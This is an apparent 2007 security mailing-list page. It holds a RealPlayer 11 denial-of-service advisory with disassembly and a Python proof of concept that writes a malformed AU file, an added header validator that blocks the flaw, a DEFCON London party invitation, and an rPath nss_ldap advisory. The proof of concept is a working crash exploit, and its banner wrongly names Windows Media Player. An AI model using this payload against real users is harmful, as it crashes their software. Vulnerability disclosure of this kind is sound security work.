Realplayer 11 DOS attack when processing a malformed AU file on MS Vista and XP

2007-12-01 Thread thesinoda
Type : DOS attack when processing a malformed AU file.

Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2

Date : 01-12-2007  

Author : Adonis, Abed safehack.com 

Link : http://www.safehack.com/Advisory/realpdos_au.txt



Disclaimer
----------

The information in this text is believed to be true based on
experiments, though it may be false. This material is presented for
informational purposes ONLY. We do not accept any liability for anything
anyone does with this information.


Brief History
-------------

Link : http://www.safehack.com/Advisory/realpdos_au.txt

RealPlayer 11 is prone to a denial-of-service vulnerability when
processing a malformed AU file.

A remote attacker can exploit this issue to crash the affected
application, denying service to legitimate users.



The Problem
-----------

Instructions:

630A87D5   894E 76    MOV DWORD PTR DS:[ESI+76],ECX
630A87D8   1BDB       SBB EBX,EBX
630A87DA   83E3 03    AND EBX,3
630A87DD   83C3 08    ADD EBX,8
630A87E0   0FAFFB     IMUL EDI,EBX
630A87E3   D1E7       SHL EDI,1
630A87E5   33D2       XOR EDX,EDX
630A87E7   F7F7       DIV EDI        <- division by zero, crash

Registers:

EAX
ECX
EDX
EBX 000B
ESP 07F5FE14
EBP 07F5FE24
ESI 01DE0E48
EDI
EIP 630A87E7 pnen3260.630A87E7



Hex Dump:

00411000  00 00 00 00 9C CF 40 00
00411008  90 D3 40 00 A0 D3 40 00
00411010  C0 D3 40 00 E0 D3 40 00
00411018  00 D4 40 00 10 D4 40 00
00411020  00 00 00 00 00 00 00 00
00411028  00 00 00 00 00 00 00 00



-:P.O.C.:-
+------------------------------------------------------------------

# RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie
# Writes the malformed AU header to test.au (ported to Python 3 syntax;
# the bytes written are exactly those of the original posting).

import sys

# Sun AU header (".snd", data offset, data size, encoding, sample rate,
# channel count) followed by zero padding and a short trailer.
head = (b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
        b"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
        b"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
        b"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        + b"\x00" * 216  # thirteen and a half rows of 16 zero bytes, as posted
        + b"\x66\x66\x66\x00")

print("[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie.")

try:
    f = open("test.au", "wb")  # binary mode so the bytes are written verbatim
except IOError as e:
    print("Unable to open file", e)
    sys.exit(0)

print("[x] File successfully opened for writing.")

try:
    f.write(head)
except IOError as e:
    print("Unable to write to file", e)
    sys.exit(0)

print("[x] File successfully written.")
f.close()
print("[x] Open test.au with RealPlayer 11.")




+------------------------------------------------------------------

Peace to you all and Happy New Year full of health and Peace.

+------------------------------------------------------------------
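The PoC header above starts with a standard Sun AU header whose channel-count field (bytes 20 to 23) is zero; the advisory does not say which header field ends up in EDI at the DIV, but a parser that range-checks every field before using it in arithmetic never reaches a zero divisor of this kind. The validator below is an added example, not the advisory's or RealPlayer's code: the field layout and encoding codes are the public Sun AU format, the accepted sample-rate and channel ranges are my assumptions, and both sample headers are constructed from the PoC bytes.

```python
import struct

AU_MAGIC = b".snd"
AU_HEADER_LEN = 24  # magic + five big-endian uint32 fields
# Bytes per sample for the common Sun AU encoding codes (public format spec)
SAMPLE_SIZE = {1: 1, 2: 1, 3: 2, 4: 3, 5: 4, 6: 4, 7: 8, 27: 1}
# Accepted ranges: assumptions chosen for this example, not from the advisory
MAX_CHANNELS, MAX_SAMPLE_RATE = 16, 192000

class MalformedAU(ValueError):
    """Raised for any header field that fails validation."""

def parse_au_header(data):
    """Validate a Sun AU header and return its decoded fields.
    Each field is range-checked before it feeds any arithmetic, so a zero
    channel count is rejected instead of becoming a zero divisor later."""
    if len(data) < AU_HEADER_LEN:
        raise MalformedAU("truncated header (%d bytes)" % len(data))
    magic, offset, size, enc, rate, chans = struct.unpack(">4s5I", data[:24])
    if magic != AU_MAGIC:
        raise MalformedAU("bad magic %r" % magic)
    if offset < AU_HEADER_LEN:
        raise MalformedAU("data offset %d overlaps header" % offset)
    if enc not in SAMPLE_SIZE:
        raise MalformedAU("unsupported encoding %d" % enc)
    if not 1 <= rate <= MAX_SAMPLE_RATE:
        raise MalformedAU("sample rate %d out of range" % rate)
    if not 1 <= chans <= MAX_CHANNELS:
        raise MalformedAU("channel count %d out of range" % chans)
    bytes_per_frame = SAMPLE_SIZE[enc] * chans  # non-zero by construction
    frames = None if size == 0xFFFFFFFF else size // bytes_per_frame
    return {"data_offset": offset, "encoding": enc, "sample_rate": rate,
            "channels": chans, "bytes_per_frame": bytes_per_frame, "frames": frames}

def describe(data):
    """One-line verdict, so callers need not catch the exception."""
    try:
        info = parse_au_header(data)
    except MalformedAU as e:
        return "rejected: " + str(e)
    return "ok: %(channels)d ch, %(bytes_per_frame)d B/frame" % info

# Constructed samples: the first 24 bytes the PoC above writes (channel count
# zero), and the same header with the channel count changed to 1.
POC_HEADER = bytes.fromhex("2e736e64 00000118 000042dc 00000001 00001f40 00000000")
SANE_HEADER = POC_HEADER[:20] + b"\x00\x00\x00\x01"

if __name__ == "__main__":
    print(describe(POC_HEADER))   # rejected: channel count 0 out of range
    print(describe(SANE_HEADER))  # ok: 1 ch, 1 B/frame
```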



DC4420 - London DEFCON chapter Christmas Party - 11th December

2007-12-01 Thread Major Malfunction

hi all,

you are cordially invited to the final DC4420 meet of 2007, which will 
be held on Tuesday the 11th December, at the usual location - Charing 
Cross Sports Club, Charing Cross Hospital:


http://www.multimap.com/map/browse.cgi?lat=51.4857&lon=-0.2194&scale=5000&icon=x

more info here:

  http://dc4420.org

we have the bar to ourselves and there will be no particular agenda 
other than drinking the place dry, eating good food and socialising, but 
we will definitely also be celebrating Alien's continued presence on our 
home planet after his near miss with the man in the black cloak!


all are welcome... "fight club" speaking rules are suspended for the 
evening, so bring a friend or two and make this a party to remember!


cheers,
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...


rPSA-2007-0255-1 nss_ldap

2007-12-01 Thread rPath Update Announcements
rPath Security Advisory: 2007-0255-1
Published: 2007-11-30
Products:
rPath Linux 1

Rating: Minor
Exposure Level Classification:
Local Weakness
Updated Versions:
[EMAIL PROTECTED]:1/239-9.2-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1913

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794

Description:
Previous versions of the nss_ldap package contain a race condition that
can cause nss_ldap to return incorrect data to requesting processes.

http://wiki.rpath.com/Advisories:rPSA-2007-0255

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html